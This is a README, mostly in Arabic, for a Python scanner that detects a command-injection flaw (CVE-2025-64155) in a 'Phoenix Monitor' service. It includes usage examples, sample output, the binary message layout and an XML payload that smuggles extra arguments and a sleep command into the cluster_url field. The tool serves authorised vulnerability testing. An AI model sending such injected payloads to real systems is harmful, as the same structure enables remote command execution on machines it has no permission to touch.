
CVE-2025-64155-hunter
ماسح بايثون لاكتشاف ثغرة حقن الأوامر (CVE-2025-64155) في خدمة Phoenix Monitor.
CVE-2025-64155 هي ثغرة حقن أوامر في خدمة Phoenix Monitor تسمح بتنفيذ الأوامر عن بُعد عبر المعامل cluster_url في الأمر handleStorageRequest (معرف الأمر: 1075724911).
تحدث الثغرة عندما يتم تمرير إدخال يتحكم به المستخدم في حقل cluster_url إلى أمر شل دون تنقية مناسبة، مما يسمح بحقن الأوامر عبر أحرف شل الوصفية.
يعتمد هذا الماسح على بحث الاستغلال بواسطة Horizon3AI.
python3 scanner.py -t <target_ip>
# Specify custom port
python3 scanner.py -t 192.168.1.100 -p 7900
# Enable verbose output
python3 scanner.py -t 192.168.1.100 -v
# Set custom timeout
python3 scanner.py -t 192.168.1.100 --timeout 15
# Check if service is accessible (no vulnerability test)
python3 scanner.py -t 192.168.1.100 --check-only
-t, --target: عنوان IP الهدف أو اسم المضيف (مطلوب)-p, --port: منفذ خدمة Phoenix Monitor (الافتراضي: 7900)--timeout: مهلة الاتصال بالثواني (الافتراضي: 10)-v, --verbose: تفعيل الإخراج المُفصَّل--check-only: فقط تحقق من إمكانية الوصول إلى الخدمةيستخدم الماسح طريقة الكشف المستند إلى الزمن:
handleStorageRequest بحمولة خبيثة تحتوي على sleep 3 في حقل cluster_urlهذه الطريقة آمنة وغير مدمرة - لا تنفذ أوامر ضارة، فقط أمر sleep غير ضار لأغراض الكشف.
[*] CVE-2025-64155 Scanner
[*] Target: 192.168.1.100:7900
[*] Scanning 192.168.1.100:7900 for CVE-2025-64155...
[*] Connecting to 192.168.1.100:7900...
[*] Connected successfully
[*] Sending test payload...
[*] Received response (1024 bytes) in 3.12 seconds
============================================================
[+] VULNERABLE: Target appears to be vulnerable to CVE-2025-64155
[+] Details: Time-based detection: Response delayed by 3.12s (likely command injection)
[*] CVE-2025-64155 Scanner
[*] Target: 192.168.1.100:7900
[*] Scanning 192.168.1.100:7900 for CVE-2025-64155...
[*] Connecting to 192.168.1.100:7900...
[*] Connected successfully
[*] Sending test payload...
[*] Received response (1024 bytes) in 0.45 seconds
============================================================
[-] NOT VULNERABLE: Target does not appear to be vulnerable
[-] Details: Response received quickly (0.45s), likely not vulnerable
يرسل الماسح رسالة ثنائية بالهيكل التالي:
[4 bytes] Message length (156)
[4 bytes] Payload length
[4 bytes] Command ID (1075724911 = 0x4018006F = handleStorageRequest)
[4 bytes] Padding/Flags (0)
[Variable] XML payload
تحتوي الحمولة XML على حقن أوامر في حقل cluster_url:
<TEST_STORAGE type="elastic">
<cluster_url>http://10.0.0.1:9200 --next -o /dev/null sleep 3</cluster_url>
...
</TEST_STORAGE>
هذه الأداة مخصصة لأغراض اختبار الأمان والبحث المصرح به فقط. استخدم هذه الأداة فقط على الأنظمة التي تملكها أو لديك إذن صريح لاختبارها. الوصول غير المصرح به إلى أنظمة الكمبيوتر غير قانوني.
رخصة MIT - انظر ملف LICENSE للتفاصيل.